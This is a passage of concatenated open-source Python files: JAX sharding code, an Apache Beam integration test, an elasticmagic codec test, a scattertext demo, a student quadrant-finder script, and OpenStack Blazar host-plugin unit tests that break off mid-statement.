lambda ct, _, partitions: (with_sharding_constraint(ct, partitions),))
xla.register_translation(sharding_constraint_p,
_sharding_constraint_translation_rule)
def _sharding_constraint_lowering(ctx, x_node, partitions):
return [mlir.wrap_with_sharding_op(x_node, xla.sharding_to_proto(partitions))]
mlir.register_lowering(sharding_constraint_p, _sharding_constraint_lowering)
def with_sharding_constraint(x, partitions: Optional[PartitionSpec]):
"""Identity-like function that specifies how ``x`` should be sharded.
WARNING: this feature is still under active development! It may not work well,
and may change without warning!
This should only be called inside a function transformed by ``sharded_jit``.
It constrains how the function is sharded: regardless of any other specified
partitions, the compiler will make sure that ``x`` is sharded according to
``partitions``. Note that a ``with_sharding_constraint`` call doesn't
necessarily correspond to a reshard, since the compiler is free to achieve
this sharding as long as the constraint is met, e.g. it might insert a reshard
earlier in the computation. Another way to think of this is that the
``with_sharding_constraint`` call may flow "up" the function to preceding
operations as well as "down" to subsequent ones.
``partitions`` must correspond to the same number of total partitions dictated
by the outer ``sharded_jit`` and any other ``with_sharding_constraint`` calls.
In the case where only replication has been specified, any ``partitions`` are
valid.
Example usage:
@partial(sharded_jit, in_parts=None, out_parts=None, num_shards=2
def f(x):
y = x + 1
y = with_sharding_constraint(y, PartitionSpec(2,1))
return y * 2
In this example, the inputs and outputs of ``f`` will be replicated, but the
inner value of ``y`` will be partitioned in half. ``f`` will run on two
devices due to the with_sharding_constraint call.
Args:
x: Array value
partitions: PartitionSpec indicating how ``x`` should be partitioned, or
None for replication.
Returns:
A new version of ``x`` with the specified sharding applied.
"""
return sharding_constraint_p.bind(x, partitions=partitions)
| google/jax | jax/interpreters/sharded_jit.py | Python | apache-2.0 | 22,527 |
#
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
"""End-to-end test for the streaming wordcount example."""
from __future__ import absolute_import
import logging
import unittest
import uuid
from builtins import range
from hamcrest.core.core.allof import all_of
from nose.plugins.attrib import attr
from apache_beam.examples import streaming_wordcount
from apache_beam.io.gcp.tests.pubsub_matcher import PubSubMessageMatcher
from apache_beam.runners.runner import PipelineState
from apache_beam.testing import test_utils
from apache_beam.testing.pipeline_verifiers import PipelineStateMatcher
from apache_beam.testing.test_pipeline import TestPipeline
INPUT_TOPIC = 'wc_topic_input'
OUTPUT_TOPIC = 'wc_topic_output'
INPUT_SUB = 'wc_subscription_input'
OUTPUT_SUB = 'wc_subscription_output'
DEFAULT_INPUT_NUMBERS = 500
WAIT_UNTIL_FINISH_DURATION = 6 * 60 * 1000 # in milliseconds
class StreamingWordCountIT(unittest.TestCase):
def setUp(self):
self.test_pipeline = TestPipeline(is_integration_test=True)
self.project = self.test_pipeline.get_option('project')
self.uuid = str(uuid.uuid4())
# Set up PubSub environment.
from google.cloud import pubsub
self.pub_client = pubsub.PublisherClient()
self.input_topic = self.pub_client.create_topic(
self.pub_client.topic_path(self.project, INPUT_TOPIC + self.uuid))
self.output_topic = self.pub_client.create_topic(
self.pub_client.topic_path(self.project, OUTPUT_TOPIC + self.uuid))
self.sub_client = pubsub.SubscriberClient()
self.input_sub = self.sub_client.create_subscription(
self.sub_client.subscription_path(self.project, INPUT_SUB + self.uuid),
self.input_topic.name)
self.output_sub = self.sub_client.create_subscription(
self.sub_client.subscription_path(self.project, OUTPUT_SUB + self.uuid),
self.output_topic.name,
ack_deadline_seconds=60)
def _inject_numbers(self, topic, num_messages):
"""Inject numbers as test data to PubSub."""
logging.debug('Injecting %d numbers to topic %s', num_messages, topic.name)
for n in range(num_messages):
self.pub_client.publish(self.input_topic.name, str(n).encode('utf-8'))
def tearDown(self):
test_utils.cleanup_subscriptions(self.sub_client,
[self.input_sub, self.output_sub])
test_utils.cleanup_topics(self.pub_client,
[self.input_topic, self.output_topic])
@attr('IT')
def test_streaming_wordcount_it(self):
# Build expected dataset.
expected_msg = [('%d: 1' % num).encode('utf-8')
for num in range(DEFAULT_INPUT_NUMBERS)]
# Set extra options to the pipeline for test purpose
state_verifier = PipelineStateMatcher(PipelineState.RUNNING)
pubsub_msg_verifier = PubSubMessageMatcher(self.project,
self.output_sub.name,
expected_msg,
timeout=400)
extra_opts = {'input_subscription': self.input_sub.name,
'output_topic': self.output_topic.name,
'wait_until_finish_duration': WAIT_UNTIL_FINISH_DURATION,
'on_success_matcher': all_of(state_verifier,
pubsub_msg_verifier)}
# Generate input data and inject to PubSub.
self._inject_numbers(self.input_topic, DEFAULT_INPUT_NUMBERS)
# Get pipeline options from command argument: --test-pipeline-options,
# and start pipeline job by calling pipeline main function.
streaming_wordcount.run(
self.test_pipeline.get_full_options_as_args(**extra_opts),
save_main_session=False)
if __name__ == '__main__':
logging.getLogger().setLevel(logging.DEBUG)
unittest.main()
| RyanSkraba/beam | sdks/python/apache_beam/examples/streaming_wordcount_it_test.py | Python | apache-2.0 | 4,580 |
import unittest
from elasticmagic.types import Integer, Float, Boolean
from elasticmagic.ext.queryfilter.codec import SimpleCodec
class SimpleCodecTest(unittest.TestCase):
def test_decode(self):
codec = SimpleCodec()
self.assertEqual(
codec.decode({'country': ['ru', 'ua', 'null']}),
{
'country': {
'exact': [['ru'], ['ua'], [None]],
}
}
)
self.assertEqual(
codec.decode({'category': ['5', '6:a', 'b:c', 'null']}, {'category': [Integer]}),
{
'category': {
'exact': [[5], [6, 'a'], [None]]
}
}
)
self.assertEqual(
codec.decode({'manu': ['1:nokia:true', '2:samsung:false']}, {'manu': [Integer, None, Boolean]}),
{
'manu': {
'exact': [[1, 'nokia', True], [2, 'samsung', False]],
}
}
)
self.assertEqual(
codec.decode({'is_active': ['true']}, {'is_active': Boolean}),
{
'is_active': {
'exact': [[True]],
}
}
)
self.assertEqual(
codec.decode([('price__gte', ['100.1', '101.0']), ('price__lte', ['200'])], {'price': Float}),
{
'price': {
'gte': [[100.1], [101.0]],
'lte': [[200.0]],
}
}
)
self.assertEqual(
codec.decode({'price__lte': '123a:bc'}, {'price': [Float]}),
{}
)
self.assertRaises(TypeError, lambda: codec.decode(''))
| popravich/elasticmagic | tests/test_codec.py | Python | apache-2.0 | 1,724 |
from transformers import RobertaTokenizerFast
import scattertext as st
tokenizer_fast = RobertaTokenizerFast.from_pretrained(
"roberta-base", add_prefix_space=True)
tokenizer = st.RobertaTokenizerWrapper(tokenizer_fast)
df = st.SampleCorpora.ConventionData2012.get_data().assign(
parse = lambda df: df.text.apply(tokenizer.tokenize)
)
corpus = st.OffsetCorpusFactory(
df,
category_col='party',
parsed_col='parse',
feat_and_offset_getter=st.TokenFeatAndOffsetGetter()
).build()
# Remove words occur less than 5 times
corpus = corpus.remove_infrequent_words(5, non_text=True)
plot_df = corpus.get_metadata_freq_df('').assign(
Y=lambda df: df.democrat,
X=lambda df: df.republican,
Ypos=lambda df: st.Scalers.dense_rank(df.Y),
Xpos=lambda df: st.Scalers.dense_rank(df.X),
SuppressDisplay=False,
ColorScore=lambda df: st.Scalers.scale_center_zero(df.Ypos - df.Xpos),
)
html = st.dataframe_scattertext(
corpus,
plot_df=plot_df,
category='democrat',
category_name='Democratic',
not_category_name='Republican',
width_in_pixels=1000,
suppress_text_column='Display',
metadata=corpus.get_df()['speaker'],
use_non_text_features=True,
ignore_categories=False,
use_offsets=True,
unified_context=False,
color_score_column='ColorScore',
left_list_column='ColorScore',
y_label='Democarats',
x_label='Republicans',
header_names={'upper': 'Top Democratic', 'lower': 'Top Republican', 'right': 'Most Frequent'},
subword_encoding='RoBERTa'
)
fn = 'roberta_sentence_piece.html'
with open(fn, 'w') as of:
of.write(html)
print("Open ./" + fn + ' in Chrome.')
| JasonKessler/scattertext | demo_tokenizer_roberta.py | Python | apache-2.0 | 1,670 |
# Brandon Michael
# cis142
# checkForQuadrant.py
# Goal: This program will keep asking for input values to check for the quadrant postion,
# origin, x-axis and y axis postions
# Notes: I used a while loop to make testing values easier and I used the input x,y
# Display program instructions
print("###################################################")
print("Quadrant Finder 1.0")
print("Enter the x and y coordinates to find the quadrant!")
print("Type [exit] to quit the program")
print("###################################################")
# Setup the x and y variables
xValue = None
yValue = None
# Setup a loop that breaks when you type exit
while True:
# Get the input values in a X,Y format
inputCoordinates = input("Type in coordinates [x,y]: ")
# Check if exit was typed, if so then exit the loop and end
if inputCoordinates == "exit":
break # stops the loop
# We want to make sure we can only strip out 2 input values
# and make sure there is a comma separating them
elif len(inputCoordinates.strip().split(',')) == 2 and inputCoordinates.count(',') == 1:
# Loop over the two numbers that are stripped out by the comma value
for coordinate in inputCoordinates.strip().split(','):
# This checks to see if we have set a value for x
# If it is still set to None then the first value is going to be xValue
if xValue is None:
xValue = int(coordinate)
# Since we are checking the xValue we can assume when the loop comes back
# a second time we can set it to yValue
else:
yValue = int(coordinate)
# If its a 0,0 value then its the Origin
if xValue == 0 and yValue == 0:
print("Origin")
else:
# If x = 0 and the y is greater or less than 0 its on the Y axis
if xValue == 0 and (yValue < 0 or yValue > 0):
print("Y - Axis")
# If x is greater or less than 0 and y = 0 its on the X axis
elif (xValue < 0 or xValue > 0) and yValue == 0:
print("X - Axis")
# Anything else and we need to check for quadrants
else:
# If x is a positive number and y is a negative positive its in Quadrant 1
if xValue > 0 and yValue > 0:
print("Quadrant I")
# If x is a negative number and y is a positive number then its in Quadrant 2
elif xValue < 0 and yValue > 0:
print("Quadrant II")
# If x is a negative number and y is negative number then its in Quadrant 3
elif xValue < 0 and yValue < 0:
print("Quadrant III")
# If x is a positive number and y is a negative number then its in Quadrant 4
elif xValue > 0 and yValue < 0:
print("Quadrant IV")
# If they typed anything but 2 numbers separated by a comma then ask for the input again
else:
print("Please type the input value as x,y")
print("Example: 1,-9")
| bwmichael/jccc-cis142-python | old/check-quadrant.py | Python | apache-2.0 | 3,124 |
# Copyright (c) 2013 Bull.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import datetime
from unittest import mock
import ddt
from novaclient import client as nova_client
from novaclient import exceptions as nova_exceptions
from oslo_config import cfg
from oslo_config import fixture as conf_fixture
import testtools
from blazar import context
from blazar.db import api as db_api
from blazar.db import exceptions as db_exceptions
from blazar.db import utils as db_utils
from blazar.manager import exceptions as manager_exceptions
from blazar.manager import service
from blazar.plugins import oshosts as plugin
from blazar.plugins.oshosts import host_plugin
from blazar import tests
from blazar.utils.openstack import base
from blazar.utils.openstack import nova
from blazar.utils.openstack import placement
from blazar.utils import trusts
CONF = cfg.CONF
class AggregateFake(object):
def __init__(self, i, name, hosts):
self.id = i
self.name = name
self.hosts = hosts
class PhysicalHostPluginSetupOnlyTestCase(tests.TestCase):
def setUp(self):
super(PhysicalHostPluginSetupOnlyTestCase, self).setUp()
self.cfg = self.useFixture(conf_fixture.Config(CONF))
self.cfg.config(os_admin_username='fake-user')
self.cfg.config(os_admin_password='fake-passwd')
self.cfg.config(os_admin_user_domain_name='fake-user-domain')
self.cfg.config(os_admin_project_name='fake-pj-name')
self.cfg.config(os_admin_project_domain_name='fake-pj-domain')
self.context = context
self.patch(self.context, 'BlazarContext')
self.patch(base, 'url_for').return_value = 'http://foo.bar'
self.host_plugin = host_plugin
self.fake_phys_plugin = self.host_plugin.PhysicalHostPlugin()
self.nova = nova
self.rp_create = self.patch(self.nova.ReservationPool, 'create')
self.db_api = db_api
self.db_host_extra_capability_get_all_per_host = (
self.patch(self.db_api, 'host_extra_capability_get_all_per_host'))
def test_configuration(self):
self.assertEqual("fake-user", self.fake_phys_plugin.username)
self.assertEqual("fake-passwd", self.fake_phys_plugin.password)
self.assertEqual("fake-user-domain",
self.fake_phys_plugin.user_domain_name)
self.assertEqual("fake-pj-name", self.fake_phys_plugin.project_name)
self.assertEqual("fake-pj-domain",
self.fake_phys_plugin.project_domain_name)
def test__get_extra_capabilities_with_values(self):
self.db_host_extra_capability_get_all_per_host.return_value = [
{'id': 1,
'capability_name': 'foo',
'capability_value': 'bar',
'other': 'value',
'computehost_id': 1
},
{'id': 2,
'capability_name': 'buzz',
'capability_value': 'word',
'computehost_id': 1
}]
res = self.fake_phys_plugin._get_extra_capabilities(1)
self.assertEqual({'foo': 'bar', 'buzz': 'word'}, res)
def test__get_extra_capabilities_with_no_capabilities(self):
self.db_host_extra_capability_get_all_per_host.return_value = []
res = self.fake_phys_plugin._get_extra_capabilities(1)
self.assertEqual({}, res)
@ddt.ddt
class PhysicalHostPluginTestCase(tests.TestCase):
def setUp(self):
super(PhysicalHostPluginTestCase, self).setUp()
self.cfg = cfg
self.context = context
self.patch(self.context, 'BlazarContext')
self.nova_client = nova_client
self.nova_client = self.patch(self.nova_client, 'Client').return_value
self.service = service
self.manager = self.service.ManagerService()
self.fake_host_id = '1'
self.fake_host = {
'id': self.fake_host_id,
'hypervisor_hostname': 'hypvsr1',
'service_name': 'compute1',
'vcpus': 4,
'cpu_info': 'foo',
'hypervisor_type': 'xen',
'hypervisor_version': 1,
'memory_mb': 8192,
'local_gb': 10,
'trust_id': 'exxee111qwwwwe',
}
self.patch(base, 'url_for').return_value = 'http://foo.bar'
self.host_plugin = host_plugin
self.fake_phys_plugin = self.host_plugin.PhysicalHostPlugin()
self.db_api = db_api
self.db_utils = db_utils
self.db_host_get = self.patch(self.db_api, 'host_get')
self.db_host_get.return_value = self.fake_host
self.db_host_list = self.patch(self.db_api, 'host_list')
self.db_host_create = self.patch(self.db_api, 'host_create')
self.db_host_update = self.patch(self.db_api, 'host_update')
self.db_host_destroy = self.patch(self.db_api, 'host_destroy')
self.db_host_extra_capability_get_all_per_host = self.patch(
self.db_api, 'host_extra_capability_get_all_per_host')
self.db_host_extra_capability_get_all_per_name = self.patch(
self.db_api, 'host_extra_capability_get_all_per_name')
self.db_host_extra_capability_create = self.patch(
self.db_api, 'host_extra_capability_create')
self.db_host_extra_capability_update = self.patch(
self.db_api, 'host_extra_capability_update')
self.nova = nova
self.rp_create = self.patch(self.nova.ReservationPool, 'create')
self.patch(self.nova.ReservationPool, 'get_aggregate_from_name_or_id')
self.add_compute_host = self.patch(self.nova.ReservationPool,
'add_computehost')
self.remove_compute_host = self.patch(self.nova.ReservationPool,
'remove_computehost')
self.get_host_details = self.patch(self.nova.NovaInventory,
'get_host_details')
self.get_host_details.return_value = self.fake_host
self.get_servers_per_host = self.patch(
self.nova.NovaInventory, 'get_servers_per_host')
self.get_servers_per_host.return_value = None
self.get_extra_capabilities = self.patch(
self.fake_phys_plugin, '_get_extra_capabilities')
self.get_extra_capabilities.return_value = {
'foo': 'bar',
'buzz': 'word',
}
self.placement = placement
self.prov_create = self.patch(self.placement.BlazarPlacementClient,
'create_reservation_provider')
self.prov_create.return_value = {
"generation": 0,
"name": "blazar_foo",
"uuid": "7d2590ae-fb85-4080-9306-058b4c915e3f",
"parent_provider_uuid": "542df8ed-9be2-49b9-b4db-6d3183ff8ec8",
"root_provider_uuid": "542df8ed-9be2-49b9-b4db-6d3183ff8ec8"
}
self.prov_delete = self.patch(self.placement.BlazarPlacementClient,
'delete_reservation_provider')
self.fake_phys_plugin.setup(None)
self.trusts = trusts
self.trust_ctx = self.patch(self.trusts, 'create_ctx_from_trust')
self.trust_create = self.patch(self.trusts, 'create_trust')
self.ServerManager = nova.ServerManager
def test_get_host(self):
host = self.fake_phys_plugin.get_computehost(self.fake_host_id)
self.db_host_get.assert_called_once_with('1')
expected = self.fake_host.copy()
expected.update({'foo': 'bar', 'buzz': 'word'})
self.assertEqual(expected, host)
def test_get_host_without_extracapabilities(self):
self.get_extra_capabilities.return_value = {}
host = self.fake_phys_plugin.get_computehost(self.fake_host_id)
self.db_host_get.assert_called_once_with('1')
self.assertEqual(self.fake_host, host)
@testtools.skip('incorrect decorator')
def test_list_hosts(self):
self.fake_phys_plugin.list_computehosts({})
self.db_host_list.assert_called_once_with()
del self.service_utils
def test_create_host_without_extra_capabilities(self):
self.get_extra_capabilities.return_value = {}
host = self.fake_phys_plugin.create_computehost(self.fake_host)
self.db_host_create.assert_called_once_with(self.fake_host)
self.prov_create.assert_called_once_with('hypvsr1')
self.assertEqual(self.fake_host, host)
def test_create_host_with_extra_capabilities(self):
fake_host = self.fake_host.copy()
fake_host.update({'foo': 'bar'})
# NOTE(sbauza): 'id' will be pop'd, we need to keep track of it
fake_request = fake_host.copy()
fake_capa = {'computehost_id': '1',
'capability_name': 'foo',
'capability_value': 'bar',
}
self.get_extra_capabilities.return_value = {'foo': 'bar'}
self.db_host_create.return_value = self.fake_host
host = self.fake_phys_plugin.create_computehost(fake_request)
self.db_host_create.assert_called_once_with(self.fake_host)
self.prov_create.assert_called_once_with('hypvsr1')
self.db_host_extra_capability_create.assert_called_once_with(fake_capa)
self.assertEqual(fake_host, host)
def test_create_host_with_capabilities_too_long(self):
fake_host = self.fake_host.copy()
fake_host.update({'foo': 'bar'})
# NOTE(sbauza): 'id' will be pop'd, we need to keep track of it
fake_request = fake_host.copy()
long_key = ""
for i in range(65):
long_key += "0"
fake_request[long_key] = "foo"
self.assertRaises(manager_exceptions.ExtraCapabilityTooLong,
self.fake_phys_plugin.create_computehost,
fake_request)
def test_create_host_without_trust_id(self):
self.assertRaises(manager_exceptions.MissingTrustId,
self.fake_phys_plugin.create_computehost, {})
def test_create_host_without_host_id(self):
self.assertRaises(manager_exceptions.InvalidHost,
self.fake_phys_plugin.create_computehost,
{'trust_id': 'exxee111qwwwwe'})
def test_create_host_with_existing_vms(self):
self.get_servers_per_host.return_value = ['server1', 'server2']
self.assertRaises(manager_exceptions.HostHavingServers,
self.fake_phys_plugin.create_computehost,
self.fake_host)
def test_create_host_issuing_rollback(self):
def fake_db_host_create(*args, **kwargs):
raise db_exceptions.BlazarDBException
self.db_host_create.side_effect = fake_db_host_create
self.assertRaises(db_exceptions.BlazarDBException,
self.fake_phys_plugin.create_computehost,
self.fake_host)
self.prov_create.assert_called_once_with('hypvsr1')
self.prov_delete.assert_called_once_with('hypvsr1')
def test_create_host_having_issue_when_storing_extra_capability(self):
def fake_db_host_extra_capability_create(*args, **kwargs):
raise db_exceptions.BlazarDBException
fake_host = self.fake_host.copy()
fake_host.update({'foo': 'bar'})
fake_request = fake_host.copy()
self.get_extra_capabilities.return_value = {'foo': 'bar'}
self.db_host_create.return_value = self.fake_host
fake = self.db_host_extra_capability_create
fake.side_effect = fake_db_host_extra_capability_create
self.assertRaises(manager_exceptions.CantAddExtraCapability,
self.fake_phys_plugin.create_computehost,
fake_request)
def test_update_host(self):
host_values = {'foo': 'baz'}
self.db_host_extra_capability_get_all_per_name.return_value = [
{'id': 'extra_id1',
'computehost_id': self.fake_host_id,
'capability_name': 'foo',
'capability_value': 'bar'
},
]
self.get_reservations_by_host = self.patch(
self.db_utils, 'get_reservations_by_host_id')
self.get_reservations_by_host.return_value = []
self.fake_phys_plugin.update_computehost(self.fake_host_id,
host_values)
self.db_host_extra_capability_update.assert_called_once_with(
'extra_id1', {'capability_name': 'foo', 'capability_value': 'baz'})
def test_update_host_having_issue_when_storing_extra_capability(self):
def fake_db_host_extra_capability_update(*args, **kwargs):
raise RuntimeError
host_values = {'foo': 'baz'}
self.get_reservations_by_host = self.patch(
self.db_utils, 'get_reservations_by_host_id')
self.get_reservations_by_host.return_value = []
self.db_host_extra_capability_get_all_per_name.return_value = [
{'id': 'extra_id1',
'computehost_id': self.fake_host_id,
'capability_name': 'foo',
'capability_value': 'bar'
},
]
fake = self.db_host_extra_capability_update
fake.side_effect = fake_db_host_extra_capability_update
self.assertRaises(manager_exceptions.CantAddExtraCapability,
self.fake_phys_plugin.update_computehost,
self.fake_host_id, host_values)
def test_update_host_with_new_extra_capability(self):
host_values = {'qux': 'word'}
self.db_host_extra_capability_get_all_per_host.return_value = []
self.fake_phys_plugin.update_computehost(self.fake_host_id,
host_values)
self.db_host_extra_capability_create.assert_called_once_with({
'computehost_id': '1',
'capability_name': 'qux',
'capability_value': 'word'
})
def test_update_host_with_used_capability(self):
host_values = {'foo': 'buzz'}
self.db_host_extra_capability_get_all_per_name.return_value = [
{'id': 'extra_id1',
'computehost_id': self.fake_host_id,
'capability_name': 'foo',
'capability_value': 'bar'
},
]
fake_phys_reservation = {
'resource_type': plugin.RESOURCE_TYPE,
'resource_id': 'resource-1',
}
fake_get_reservations = self.patch(self.db_utils,
'get_reservations_by_host_id')
fake_get_reservations.return_value = [fake_phys_reservation]
fake_get_plugin_reservation = self.patch(self.db_utils,
'get_plugin_reservation')
fake_get_plugin_reservation.return_value = {
'resource_properties': '["==", "$foo", "bar"]'
}
self.assertRaises(manager_exceptions.CantAddExtraCapability,
self.fake_phys_plugin.update_computehost,
self.fake_host_id, host_values)
fake_get_plugin_reservation.assert_called_once_with(
plugin.RESOURCE_TYPE, 'resource-1')
def test_delete_host(self):
host_allocation_get_all = self.patch(
self.db_api,
'host_allocation_get_all_by_values')
host_allocation_get_all.return_value = []
self.fake_phys_plugin.delete_computehost(self.fake_host_id)
self.db_host_destroy.assert_called_once_with(self.fake_host_id)
self.prov_delete.assert_called_once_with('hypvsr1')
self.get_servers_per_host.assert_called_once_with(
self.fake_host["hypervisor_hostname"])
def test_delete_host_reserved(self):
host_allocation_get_all = self.patch(
self.db_api,
'host_allocation_get_all_by_values')
host_allocation_get_all.return_value = [
{
'id': u'dd305477-4df8-4547-87f6-69069ee546a6',
'compute_host_id': self.fake_host_id
}
]
self.assertRaises(manager_exceptions.CantDeleteHost,
self.fake_phys_plugin.delete_computehost,
self.fake_host_id)
def test_delete_host_having_vms(self):
host_allocation_get_all = self.patch(
self.db_api,
'host_allocation_get_all_by_values')
host_allocation_get_all.return_value = []
self.get_servers_per_host.return_value = ['server1', 'server2']
self.assertRaises(manager_exceptions.HostHavingServers,
self.fake_phys_plugin.delete_computehost,
self.fake_host_id)
self.get_servers_per_host.assert_called_once_with(
self.fake_host["hypervisor_hostname"])
def test_delete_host_not_existing_in_db(self):
self.db_host_get.return_value = None
self.assertRaises(manager_exceptions.HostNotFound,
self.fake_phys_plugin.delete_computehost,
self.fake_host_id)
def test_delete_host_issuing_rollback(self):
def fake_db_host_destroy(*args, **kwargs):
raise db_exceptions.BlazarDBException
host_allocation_get_all = self.patch(
self.db_api,
'host_allocation_get_all_by_values')
host_allocation_get_all.return_value = []
self.db_host_destroy.side_effect = fake_db_host_destroy
self.assertRaises(manager_exceptions.CantDeleteHost,
self.fake_phys_plugin.delete_computehost,
self.fake_host_id)
def test_list_allocations(self):
self.db_get_reserv_allocs = self.patch(
self.db_utils, 'get_reservation_allocations_by_host_ids')
# Expecting a list of (Reservation, Allocation)
self.db_get_reserv_allocs.return_value = [
('reservation-1', 'lease-1', 'host-1'),
('reservation-1', 'lease-1', 'host-2'),
('reservation-2', 'lease-1', 'host-2'),
('reservation-2', 'lease-1', 'host-3'),
('reservation-3', 'lease-2', 'host-1'),
]
expected = [
{
'resource_id': 'host-1',
'reservations': [
{'id': 'reservation-1', 'lease_id': 'lease-1'},
{'id': 'reservation-3', 'lease_id': 'lease-2'},
]
},
{
'resource_id': 'host-2',
'reservations': [
{'id': 'reservation-1', 'lease_id': 'lease-1'},
{'id': 'reservation-2', 'lease_id': 'lease-1'},
]
},
{
'resource_id': 'host-3',
'reservations': [
{'id': 'reservation-2', 'lease_id': 'lease-1'},
]
}
]
ret = self.fake_phys_plugin.list_allocations({})
# Sort returned value to use assertListEqual
for r in ret:
r['reservations'].sort(key=lambda x: x['id'])
ret.sort(key=lambda x: x['resource_id'])
self.assertListEqual(expected, ret)
def test_list_allocations_with_lease_id(self):
self.db_get_reserv_allocs = self.patch(
self.db_utils, 'get_reservation_allocations_by_host_ids')
# Expecting a list of (Reservation, Allocation)
self.db_get_reserv_allocs.return_value = [
('reservation-1', 'lease-1', 'host-1'),
('reservation-1', 'lease-1', 'host-2'),
('reservation-2', 'lease-1', 'host-2'),
('reservation-2', 'lease-1', 'host-3'),
]
expected = [
{
'resource_id': 'host-1',
'reservations': [
{'id': 'reservation-1', 'lease_id': 'lease-1'},
]
},
{
'resource_id': 'host-2',
'reservations': [
{'id': 'reservation-1', 'lease_id': 'lease-1'},
{'id': 'reservation-2', 'lease_id': 'lease-1'},
]
},
{
'resource_id': 'host-3',
'reservations': [
{'id': 'reservation-2', 'lease_id': 'lease-1'},
]
}
]
ret = self.fake_phys_plugin.list_allocations({'lease_id': 'lease-1'})
# Sort returned value to use assertListEqual
for r in ret:
r['reservations'].sort(key=lambda x: x['id'])
ret.sort(key=lambda x: x['resource_id'])
self.assertListEqual(expected, ret)
def test_list_allocations_with_reservation_id(self):
self.db_get_reserv_allocs = self.patch(
self.db_utils, 'get_reservation_allocations_by_host_ids')
# Expecting a list of (Reservation, Allocation)
self.db_get_reserv_allocs.return_value = [
('reservation-1', 'lease-1', 'host-1'),
('reservation-1', 'lease-1', 'host-2'),
]
expected = [
{
'resource_id': 'host-1',
'reservations': [
{'id': 'reservation-1', 'lease_id': 'lease-1'},
]
},
{
'resource_id': 'host-2',
'reservations': [
{'id': 'reservation-1', 'lease_id': 'lease-1'},
]
},
]
ret = self.fake_phys_plugin.list_allocations(
{'reservation_id': 'reservation-1'})
# Sort returned value to use assertListEqual
for r in ret:
r['reservations'].sort(key=lambda x: x['id'])
ret.sort(key=lambda x: x['resource_id'])
self.assertListEqual(expected, ret)
def test_get_allocations(self):
self.db_get_reserv_allocs = self.patch(
self.db_utils, 'get_reservation_allocations_by_host_ids')
# Expecting a list of (Reservation, Allocation)
self.db_get_reserv_allocs.return_value = [
('reservation-1', 'lease-1', 'host-1'),
('reservation-1', 'lease-1', 'host-2'),
('reservation-2', 'lease-1', 'host-2'),
('reservation-2', 'lease-1', 'host-3'),
('reservation-3', 'lease-2', 'host-1'),
]
expected = {
'resource_id': 'host-1',
'reservations': [
{'id': 'reservation-1', 'lease_id': 'lease-1'},
{'id': 'reservation-3', 'lease_id': 'lease-2'},
]
}
ret = self.fake_phys_plugin.get_allocations('host-1', {})
# sort returned value to use assertListEqual
ret['reservations'].sort(key=lambda x: x['id'])
self.assertDictEqual(expected, ret)
def test_get_allocations_with_lease_id(self):
self.db_get_reserv_allocs = self.patch(
self.db_utils, 'get_reservation_allocations_by_host_ids')
# Expecting a list of (Reservation, Allocation)
self.db_get_reserv_allocs.return_value = [
('reservation-1', 'lease-1', 'host-1'),
]
expected = {
'resource_id': 'host-1',
'reservations': [
{'id': 'reservation-1', 'lease_id': 'lease-1'},
]
}
ret = self.fake_phys_plugin.get_allocations('host-1',
{'lease_id': 'lease-1'})
# sort returned value to use assertListEqual
ret['reservations'].sort(key=lambda x: x['id'])
self.assertDictEqual(expected, ret)
def test_get_allocations_with_reservation_id(self):
self.db_get_reserv_allocs = self.patch(
self.db_utils, 'get_reservation_allocations_by_host_ids')
# Expecting a list of (Reservation, Allocation)
self.db_get_reserv_allocs.return_value = [
('reservation-1', 'lease-1', 'host-1'),
]
expected = {
'resource_id': 'host-1',
'reservations': [
{'id': 'reservation-1', 'lease_id': 'lease-1'},
]
}
ret = self.fake_phys_plugin.get_allocations(
'host-1', {'reservation_id': 'reservation-1'})
# sort returned value to use assertListEqual
ret['reservations'].sort(key=lambda x: x['id'])
self.assertDictEqual(expected, ret)
def test_get_allocations_with_invalid_host(self):
self.db_get_reserv_allocs = self.patch(
self.db_utils, 'get_reservation_allocations_by_host_ids')
# Expecting a list of (Reservation, Allocation)
self.db_get_reserv_allocs.return_value = [
('reservation-1', 'lease-1', 'host-1'),
('reservation-1', 'lease-1', 'host-2'),
('reservation-2', 'lease-1', 'host-2'),
('reservation-2', 'lease-1', 'host-3'),
('reservation-3', 'lease-2', 'host-1'),
]
expected = {'resource_id': 'no-reserved-host', 'reservations': []}
ret = self.fake_phys_plugin.get_allocations('no-reserved-host', {})
self.assertDictEqual(expected, ret)
def test_create_reservation_no_hosts_available(self):
now = datetime.datetime.utcnow()
values = {
'lease_id': u'018c1b43-e69e-4aef-a543-09681539cf4c',
'min': 1,
'max': 1,
'hypervisor_properties': '["=", "$memory_mb", "256"]',
'resource_properties': '',
'start_date': now,
'end_date': now + datetime.timedelta(hours=1),
'resource_type': plugin.RESOURCE_TYPE,
}
host_reservation_create = self.patch(self.db_api,
'host_reservation_create')
matching_hosts = self.patch(self.fake_phys_plugin, '_matching_hosts')
matching_hosts.return_value = []
self.assertRaises(manager_exceptions.NotEnoughHostsAvailable,
self.fake_phys_plugin.reserve_resource,
u'f9894fcf-e2ed-41e9-8a4c-92fac332608e',
values)
self.rp_create.assert_not_called()
host_reservation_create.assert_not_called()
def test_create_reservation_hosts_available(self):
values = {
'lease_id': u'018c1b43-e69e-4aef-a543-09681539cf4c',
'min': 1,
'max': 1,
'hypervisor_properties': '["=", "$memory_mb", "256"]',
'resource_properties': '',
'start_date': datetime.datetime(2013, 12, 19, 20, 00),
'end_date': datetime.datetime(2013, 12, 19, 21, 00),
'resource_type': plugin.RESOURCE_TYPE,
}
self.rp_create.return_value = mock.MagicMock(id=1)
host_reservation_create = self.patch(self.db_api,
'host_reservation_create')
matching_hosts = self.patch(self.fake_phys_plugin, '_matching_hosts')
matching_hosts.return_value = ['host1', 'host2']
host_allocation_create = self.patch(
self.db_api,
